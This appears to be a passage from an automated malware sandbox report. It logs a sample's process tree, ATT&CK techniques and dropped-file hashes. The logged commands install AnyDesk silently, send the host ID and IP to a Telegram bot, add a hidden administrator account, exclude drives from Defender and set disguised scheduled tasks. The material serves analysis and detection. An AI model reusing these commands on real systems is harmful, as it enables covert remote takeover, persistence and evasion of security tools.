C:\Windows\system32\net1 stop AnyDesk
5⤵
PID:3488

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM anydesk.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4632

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM wininit1.exe /F
4⤵
- Kills process with taskkill
PID:3240

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell cmd.exe /c C:\ProgramData\wsappz.exe --install C:\ProgramData\AnyDesk --start-with-win --silent
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4680

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\ProgramData\wsappz.exe --install C:\ProgramData\AnyDesk --start-with-win --silent
5⤵
PID:4556

C:\ProgramData\wsappz.exe
C:\ProgramData\wsappz.exe --install C:\ProgramData\AnyDesk --start-with-win --silent
6⤵
- Executes dropped EXE
- Modifies registry class
PID:2652

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 10 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:6116

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell cmd.exe /c echo Pass32552
4⤵
PID:5824

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c echo Pass32552
5⤵
PID:5396

C:\ProgramData\AnyDesk\AnyDesk.exe
C:\ProgramData\AnyDesk\anydesk.exe --set-password
4⤵
PID:5892

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 10 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:5936

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell cmd.exe /c C:\ProgramData\AnyDesk\anydesk.exe --get-id
4⤵
PID:5448

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\ProgramData\AnyDesk\anydesk.exe --get-id
5⤵
PID:6068

C:\ProgramData\AnyDesk\AnyDesk.exe
C:\ProgramData\AnyDesk\anydesk.exe --get-id
6⤵
PID:5320

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 10 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:1248

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c find /n /v ""
4⤵
PID:2456

C:\Windows\SysWOW64\find.exe
find /n /v ""
5⤵
PID:4596

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "(new-object System.Net.WebClient).DownloadString('https://ipinfo.io/ip')"
4⤵
PID:5404

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c find /n /v ""
4⤵
PID:6032

C:\Windows\SysWOW64\find.exe
find /n /v ""
5⤵
PID:5504

\??\c:\windows\curl.exe
c:\windows\curl.exe --insecure --data chat_id="552691400" --data parse-mode=markdown --data-urlencode text="ANY_HMAHKCMS'id:'"0"'ip:'"154.61.71.13"" "https://api.telegram.org/bot"5513453963:AAEqmVGigjirKuykDiL7YHcdVrBQ72q07Ss"/sendMessage"
4⤵
PID:1084

C:\Windows\SysWOW64\net.exe
net user oldadministrator "Pass32552" /add
4⤵
PID:676

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user oldadministrator "Pass32552" /add
5⤵
PID:5472

C:\Windows\SysWOW64\net.exe
net localgroup Administrators oldadministrator /ADD
4⤵
PID:5628

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup Administrators oldadministrator /ADD
5⤵
PID:5924

C:\Windows\SysWOW64\net.exe
net localgroup administradores oldadministrator /add
4⤵
PID:2088

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup administradores oldadministrator /add
5⤵
PID:2256

C:\Windows\SysWOW64\net.exe
net localgroup administratoren oldadministrator /add
4⤵
PID:4816

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup administratoren oldadministrator /add
5⤵
PID:4708

C:\Windows\SysWOW64\net.exe
net localgroup administrateurs oldadministrator /add
4⤵
PID:2328

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup administrateurs oldadministrator /add
5⤵
PID:3536

C:\programdata\dc.exe
"C:\programdata\dc.exe"
2⤵
PID:1012

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\runtimeMonitor\eW0NlR3z8rHah1r0tet2KhNAo.vbe"
3⤵
- Suspicious use of WriteProcessMemory
PID:392

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\runtimeMonitor\PsYm20I.bat" "
4⤵
PID:3972

C:\runtimeMonitor\ComdriverSvc.exe
"C:\runtimeMonitor\ComdriverSvc.exe"
5⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:3980

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:640

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4644

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:288

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1528

C:\Program Files\Windows Multimedia Platform\dllhost.exe
"C:\Program Files\Windows Multimedia Platform\dllhost.exe"
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4528

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1368

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/runtimeMonitor/'
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:864

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3844

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4672

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
6⤵
PID:420

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/odt/'
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4664

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4580

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4616

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3240

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:4540

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:2448

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\runtimeMonitor\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2588

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\runtimeMonitor\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1976

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\runtimeMonitor\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4052

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 8 /tr "'C:\Users\Default\Links\WmiPrvSE.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4584

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\Default\Links\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4704

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 12 /tr "'C:\Users\Default\Links\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4264

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Multimedia Platform\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4844

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4248

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Executes dropped EXE
- Creates scheduled task(s)
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1012

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4360

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4776

C:\ProgramData\AnyDesk\AnyDesk.exe
"C:\ProgramData\AnyDesk\AnyDesk.exe" --service
1⤵
- Executes dropped EXE
PID:4700

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\winlogon.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3952

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3988

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Multimedia Platform\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3116

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Windows Multimedia Platform\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3716

C:\ProgramData\AnyDesk\AnyDesk.exe
"C:\ProgramData\AnyDesk\AnyDesk.exe" --control
1⤵
PID:1388

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:1800

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:420

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Winlogon Helper DLL

T1004

Modify Existing Service

T1031

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

File Permissions Modification

T1222

Disabling Security Tools

T1089

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Process Discovery

T1057

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Windows Multimedia Platform\dllhost.exe
Filesize
1.0MB

MD5
18557c37efdef82648622fa471a2db2f

SHA1
e72f774a0bd16c3d7074a826f7f1711845738972

SHA256
04142a2c4e3157a371266a5705959946268fc74b942597062e4dc3ce5f570c27

SHA512
fa0a4e1f74806ff77ad71315d2fc4e008b74c0aac3fc8cbb7e6fe44278e0edde62f99c4d9c3aaff41bc134fc083fe73b638035382c279169f378b66a9bf09d9b

Download Submit
C:\Program Files\Windows Multimedia Platform\dllhost.exe
Filesize
1.0MB

MD5
18557c37efdef82648622fa471a2db2f

SHA1
e72f774a0bd16c3d7074a826f7f1711845738972

SHA256
04142a2c4e3157a371266a5705959946268fc74b942597062e4dc3ce5f570c27

SHA512
fa0a4e1f74806ff77ad71315d2fc4e008b74c0aac3fc8cbb7e6fe44278e0edde62f99c4d9c3aaff41bc134fc083fe73b638035382c279169f378b66a9bf09d9b

Download Submit
C:\ProgramData\1.exe
Filesize
775KB

MD5
0442a8479aa5f19dd5a64ddfd677b9f8

SHA1
fa003104e8e8e6646049a49bd517224ba34ac4b6

SHA256
5161a16217b9d8b9817ad1f6e1020e2eb625bbd6ccf82fbf9423077d0c966aa0

SHA512
51ddbff08b54bbafd365e71432697bea5a3eb49bd87dafd477a059f59e1f2f2eaa8e465abda8499745a9a81c6e10a5c44a9a255d51d79d5e8a7b7c25709abe42

Download Submit
C:\ProgramData\1.exe
Filesize
775KB

MD5
0442a8479aa5f19dd5a64ddfd677b9f8

SHA1
fa003104e8e8e6646049a49bd517224ba34ac4b6

SHA256
5161a16217b9d8b9817ad1f6e1020e2eb625bbd6ccf82fbf9423077d0c966aa0

SHA512
51ddbff08b54bbafd365e71432697bea5a3eb49bd87dafd477a059f59e1f2f2eaa8e465abda8499745a9a81c6e10a5c44a9a255d51d79d5e8a7b7c25709abe42

Download Submit
C:\ProgramData\AnyDesk\AnyDesk.exe
Filesize
3.8MB

MD5
9a1d9fe9b1223273c314632d04008384

SHA1
665cad3ed21f6443d1adacf18ca45dfaa8f52c99

SHA256
0f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359

SHA512
3ec400acd075a4078d7d9f06c853be4ee0fdd7a9d1628428326534df6c0f3ea8f745af9d29031e9259a1bee2f78dd48dfaebcb7e897c22736909a9d6b4f24ba5

Download Submit
C:\ProgramData\AnyDesk\AnyDesk.exe
Filesize
3.8MB

MD5
9a1d9fe9b1223273c314632d04008384

SHA1
665cad3ed21f6443d1adacf18ca45dfaa8f52c99

SHA256
0f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359

SHA512
3ec400acd075a4078d7d9f06c853be4ee0fdd7a9d1628428326534df6c0f3ea8f745af9d29031e9259a1bee2f78dd48dfaebcb7e897c22736909a9d6b4f24ba5

Download Submit
C:\ProgramData\AnyDesk\AnyDesk.exe
Filesize
3.8MB

MD5
9a1d9fe9b1223273c314632d04008384

SHA1
665cad3ed21f6443d1adacf18ca45dfaa8f52c99

SHA256
0f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359

SHA512
3ec400acd075a4078d7d9f06c853be4ee0fdd7a9d1628428326534df6c0f3ea8f745af9d29031e9259a1bee2f78dd48dfaebcb7e897c22736909a9d6b4f24ba5

Download Submit
C:\ProgramData\AnyDesk\AnyDesk.exe
Filesize
3.8MB

MD5
9a1d9fe9b1223273c314632d04008384

SHA1
665cad3ed21f6443d1adacf18ca45dfaa8f52c99

SHA256
0f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359

SHA512
3ec400acd075a4078d7d9f06c853be4ee0fdd7a9d1628428326534df6c0f3ea8f745af9d29031e9259a1bee2f78dd48dfaebcb7e897c22736909a9d6b4f24ba5

Download Submit
C:\ProgramData\AnyDesk\AnyDesk.exe
Filesize
3.8MB

MD5
9a1d9fe9b1223273c314632d04008384

SHA1
665cad3ed21f6443d1adacf18ca45dfaa8f52c99

SHA256
0f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359

SHA512
3ec400acd075a4078d7d9f06c853be4ee0fdd7a9d1628428326534df6c0f3ea8f745af9d29031e9259a1bee2f78dd48dfaebcb7e897c22736909a9d6b4f24ba5

Download Submit
C:\ProgramData\AnyDesk\service.conf
Filesize
2KB

MD5
80848e577a32d84d2a3b6d31b3b89030

SHA1
89b2bce312c39300975514b10d2514f385280f00

SHA256
0332dd25e941235b6cfebe4feb19ceea240c920defd85b29934cc510e6accf23

SHA512
3626a7f4f3e820711c611ab9f495b40a59de80d4eddaa8470bfc1ccb2503b89bfb26756d2d0ec6e09ec4ea2e4f0ebb02709f9a1eaa685d3f960916242e614ef2

Download Submit
C:\ProgramData\AnyDesk\service.conf
Filesize
2KB

MD5
38be07f8e4f4731f7b5cfe516fc2a4bb

SHA1
af09e0b679191df618c993651abcec2a2957ece7

SHA256
9728f96504844d0d18ecd4f6ab5f8d6b6f3bc2019683f282ed65bafd355abdd9

SHA512
2ed0573ee068a76686152dfb628a9f53e667b170f0a74489546751e70a06f8faa66806e17aede0f4ac77a746bacb5e0a55ec39ad431671571e79a54547b58814

Download Submit
C:\ProgramData\AnyDesk\system.conf
Filesize
370B

MD5
afdc4f69f4720b8c4153f6186f49a2b6

SHA1
329c27ea36d7913809b0c239bb58e91d2ee468ac

SHA256
9a218849d74b0ca75ef719b0cab59b40529b958097eb0b0b8527b09bc293a571

SHA512
3a8a6e1994a681a12875b820eb7ca78b6c035a1489c4d8648590424dbec3152e6831ac0c4a73560968231c9b45db869dad189109fb1ecb4a3159258e0099a7de

Download Submit
C:\ProgramData\AnyDesk\system.conf
Filesize
482B

MD5
e531eefcfd824dbe2a6233a1a947bd48

SHA1
ca5aeef6ef967266ebe2c74b28de453b5fb2dcb8

SHA256
ea095db51189695e83eb1e86f52b027f8a3b8d6c2b691c5a58b561f433760769

SHA512
222b113afe45586703ff2c70707e84c033204240774b59c07cb53d190e89969800f7110aa641fe67de4cf4d86f15c6bdfc8c17ecdc99309b0281de66077a7f8c

Download Submit
C:\ProgramData\AnyDesk\system.conf
Filesize
482B

MD5
e531eefcfd824dbe2a6233a1a947bd48

SHA1
ca5aeef6ef967266ebe2c74b28de453b5fb2dcb8

SHA256
ea095db51189695e83eb1e86f52b027f8a3b8d6c2b691c5a58b561f433760769

SHA512
222b113afe45586703ff2c70707e84c033204240774b59c07cb53d190e89969800f7110aa641fe67de4cf4d86f15c6bdfc8c17ecdc99309b0281de66077a7f8c

Download Submit
C:\ProgramData\AnyDesk\system.conf
Filesize
482B

MD5
e531eefcfd824dbe2a6233a1a947bd48

SHA1
ca5aeef6ef967266ebe2c74b28de453b5fb2dcb8

SHA256
ea095db51189695e83eb1e86f52b027f8a3b8d6c2b691c5a58b561f433760769

SHA512
222b113afe45586703ff2c70707e84c033204240774b59c07cb53d190e89969800f7110aa641fe67de4cf4d86f15c6bdfc8c17ecdc99309b0281de66077a7f8c

Download Submit
C:\ProgramData\AnyDesk\system.conf
Filesize
691B

MD5
fcb86c86ad6bdefabfd9339f9b7cbb0d

SHA1
6baa658cf230c2bf564f074dad801db5ce5e402a

SHA256
d11151f95c502c44abf79b709885278059062c8b92f49b06928eb61518e3f7e8

SHA512
664f022821bfe2974bcb230bb07927fb114f74156dc913bfc3bb098c38c5c5a12bab62c02efed032b901ab5103ad94fd760c87fa38dbff70296521cba8e9552e

Download Submit
C:\ProgramData\AnyDesk\system.conf
Filesize
691B

MD5
fcb86c86ad6bdefabfd9339f9b7cbb0d

SHA1
6baa658cf230c2bf564f074dad801db5ce5e402a

SHA256
d11151f95c502c44abf79b709885278059062c8b92f49b06928eb61518e3f7e8

SHA512
664f022821bfe2974bcb230bb07927fb114f74156dc913bfc3bb098c38c5c5a12bab62c02efed032b901ab5103ad94fd760c87fa38dbff70296521cba8e9552e

Download Submit
C:\ProgramData\AnyDesk\system.conf
Filesize
691B

MD5
f2ee2b01a20118ff604e16582055abeb

SHA1
f5db33ee8cfee0661ff73b31d9609fa99da57183

SHA256
bb0c95df9f3c4dcd83d7ed3fa4581e805956332fcdd96e1e4929e09332cfd1ca

SHA512
afef93194408499e8b0bf09433c8d2aadb67070a8c2180483a343a4f9b6ae52edb1e27dff1b4e42459617634f3b4b3d26390f520df4bbcb5898e6995e1ef68a0

Download Submit
C:\ProgramData\AnyDesk\system.conf
Filesize
691B

MD5
fcb86c86ad6bdefabfd9339f9b7cbb0d

SHA1
6baa658cf230c2bf564f074dad801db5ce5e402a

SHA256
d11151f95c502c44abf79b709885278059062c8b92f49b06928eb61518e3f7e8

SHA512
664f022821bfe2974bcb230bb07927fb114f74156dc913bfc3bb098c38c5c5a12bab62c02efed032b901ab5103ad94fd760c87fa38dbff70296521cba8e9552e

Download Submit
C:\ProgramData\AnyDesk\system.conf
Filesize
691B

MD5
fcb86c86ad6bdefabfd9339f9b7cbb0d

SHA1
6baa658cf230c2bf564f074dad801db5ce5e402a

SHA256
d11151f95c502c44abf79b709885278059062c8b92f49b06928eb61518e3f7e8

SHA512
664f022821bfe2974bcb230bb07927fb114f74156dc913bfc3bb098c38c5c5a12bab62c02efed032b901ab5103ad94fd760c87fa38dbff70296521cba8e9552e

Download Submit
C:\ProgramData\any.exe
Filesize
6.1MB

MD5
83834462455be62ccf135f3137263119

SHA1
f23d183db2adf37e80469191c7d452e8d39935b6

SHA256
565c7756135d7858e8963928fff8d1fdb99a452d8568319aeda4a073f51d0a23

SHA512
7aa6374b4bafae925a1da59212fdb7f262f98848c058173777c0f30c61243b982cfc3d13ce106e9eb59cfb9957c81a5b496e82a5522e9209f0c30f53f864c411

Download Submit
C:\ProgramData\curl.exe
Filesize
5.2MB

MD5
104023cef829fce3e34bf1514daff629

SHA1
b6e7b949109298ec7ff1aa64404a859b5b41ccae

SHA256
15b1158d806de14013fdc3f0e81dca725481d2393249994a122c0a70721ae9f5

SHA512
efebee49ffebf0dcb07c6e7d24477101a7c8a2a03b0bea4df9c1054943823026ffd46f54cc51fb8de062e3641f021d5cf0b23ed67d46a549ee23e5fa7b12be1e

Download Submit
C:\ProgramData\dc.exe
Filesize
1.3MB

MD5
dae7ec3880731dcd27311b4e1dab5e49

SHA1
52d88c8917cbbe4c40bf2e3a67ef8eaad2b52ffc

SHA256
59a058a95f24d57c98b1801a1bc1e1545db8be230a628e2f7dcc34c0452f2d19

SHA512
8064f3819c815db7cafe243de781bd7755f208ea932f383687421ecd56d610c1929426f6ca55b592e51147386f2ece42bc9b2ebb5a208381a510f9dd88d6e5da

Download Submit
C:\ProgramData\wsappz.exe
Filesize
3.8MB

MD5
9a1d9fe9b1223273c314632d04008384

SHA1
665cad3ed21f6443d1adacf18ca45dfaa8f52c99

SHA256
0f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359

SHA512
3ec400acd075a4078d7d9f06c853be4ee0fdd7a9d1628428326534df6c0f3ea8f745af9d29031e9259a1bee2f78dd48dfaebcb7e897c22736909a9d6b4f24ba5

Download Submit
C:\ProgramData\wsappz.exe
Filesize
3.8MB

MD5
9a1d9fe9b1223273c314632d04008384

SHA1
665cad3ed21f6443d1adacf18ca45dfaa8f52c99

SHA256
0f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359

SHA512
3ec400acd075a4078d7d9f06c853be4ee0fdd7a9d1628428326534df6c0f3ea8f745af9d29031e9259a1bee2f78dd48dfaebcb7e897c22736909a9d6b4f24ba5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
ad5cd538ca58cb28ede39c108acb5785

SHA1
1ae910026f3dbe90ed025e9e96ead2b5399be877

SHA256
c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

SHA512
c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
1c19c16e21c97ed42d5beabc93391fc5

SHA1
8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68

SHA256
1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05

SHA512
7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
2cacabbdbb58e4504dfd8dab387fd375

SHA1
4488813d638219de2ada11ef02e0dd5973b9cb98

SHA256
f12b98150fd5ca2e9fcc4538ffd428f8c4859803601e1741b33d8a502bca4492

SHA512
4e4b5cc793efa54218d83aa195d7d5df1a56118c6cf7d78d6104f35aacccf058bcee12abb681dffd5e0eeeae5db80a4cb020fe62e0096f3007123e934deff09a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
12KB

MD5
f1b8faa6f5f999748db1428a6e602c27

SHA1
e99ee43438e9d9104a04c093ef62716795dd53c9

SHA256
74da192e7bc016aaca1936ff38567264c05e5a50ebf01c49bbd665c7b4ddf730

SHA512
d99b4ca22794eb7a07f86638b4aee7de311e44767558633356277ac3a57063257eb24059827cce72e1af086fec673820011b335790266b80ed5697738ec4bea6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
7889727ef37b025fa0a206562bd09656

SHA1
f8b7b5d8fa02bd0dbed2d148b35de8ca94acf6ea

SHA256
53aa7e5e7929d3318d908bd4dbf251c32c5f1c1936820aa693f98656cad599f7

SHA512
4cceaf9b01df09c808991135c16a7a9df3c73d87c253296dcfa6d0e3eb46389c6538b58805819fca3cb21363591347488c08ccc9af154fc82fdbd097fa0cc4b1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
12KB

MD5
0a4f04b1e1e682c5956a6f1b35e32ccc

SHA1
b98cf29e26235a4bbfd718ba064c43314b8b86eb

SHA256
e1b00cf777d526d5a0b4b84b99a5505df413443d469a82b25fee7b74ae08f216

SHA512
e6ea34227f71698b09a4e338ba600661ea3235158f7bd0ca9a39de1bed297801dca84f6a0536bbffa5abb2056f88857f4c0d2941c5530c301b9bb58659b1cdb3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
7889727ef37b025fa0a206562bd09656

SHA1
f8b7b5d8fa02bd0dbed2d148b35de8ca94acf6ea

SHA256
53aa7e5e7929d3318d908bd4dbf251c32c5f1c1936820aa693f98656cad599f7

SHA512
4cceaf9b01df09c808991135c16a7a9df3c73d87c253296dcfa6d0e3eb46389c6538b58805819fca3cb21363591347488c08ccc9af154fc82fdbd097fa0cc4b1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
67bee59a77d27fe5629169ea499e1f67

SHA1
458a0e4ef37e2f824d905f46f04938e46d382283

SHA256
eea8c6f44d6dc8e8e972e4f26728fdcd68bf3557c302ab7851521eb8d2f8ae4f

SHA512
6bd22ff5a512c8c77c60bae6fa206d93aaf089c02842901aea500ee45500bcca78aabcfa0ff13bbe79e493063a87f942be0f6822131fdf28d3d29f235f9f5597

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
7889727ef37b025fa0a206562bd09656

SHA1
f8b7b5d8fa02bd0dbed2d148b35de8ca94acf6ea

SHA256
53aa7e5e7929d3318d908bd4dbf251c32c5f1c1936820aa693f98656cad599f7

SHA512
4cceaf9b01df09c808991135c16a7a9df3c73d87c253296dcfa6d0e3eb46389c6538b58805819fca3cb21363591347488c08ccc9af154fc82fdbd097fa0cc4b1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
7889727ef37b025fa0a206562bd09656

SHA1
f8b7b5d8fa02bd0dbed2d148b35de8ca94acf6ea

SHA256
53aa7e5e7929d3318d908bd4dbf251c32c5f1c1936820aa693f98656cad599f7

SHA512
4cceaf9b01df09c808991135c16a7a9df3c73d87c253296dcfa6d0e3eb46389c6538b58805819fca3cb21363591347488c08ccc9af154fc82fdbd097fa0cc4b1

Download Submit
